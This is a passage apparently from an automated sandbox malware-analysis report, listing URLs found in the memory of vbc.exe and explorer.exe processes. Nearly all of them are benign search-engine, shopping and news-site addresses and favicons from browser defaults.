          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: vbc.exe, 00000004.00000002.2185288938.00000000020D0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2184022473.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: vbc.exe, 00000004.00000002.2187644735.0000000002B20000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2193363626.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: vbc.exe, 00000004.00000002.2187003140.0000000002927000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190811877.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207576712.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: vbc.exe, 00000004.00000002.2187003140.0000000002927000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190811877.0000000003E27000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.2207576712.000000000A330000.00000008.00000001.sdmp | String found in binary or memory: http://www.%s.com
          Source: vbc.exe, 00000004.00000002.2185288938.00000000020D0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2184022473.0000000001C70000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.si/
          Source: vbc.exe, 00000004.00000002.2186682993.0000000002740000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.iask.com/favicon.ico
          Source: vbc.exe, 00000004.00000002.2187003140.0000000002927000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190811877.0000000003E27000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2208077400.000000000B149000.00000004.00000001.sdmp | String found in binary or memory: http://www.mozilla.com0
          Source: vbc.exe, 00000004.00000002.2186682993.0000000002740000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
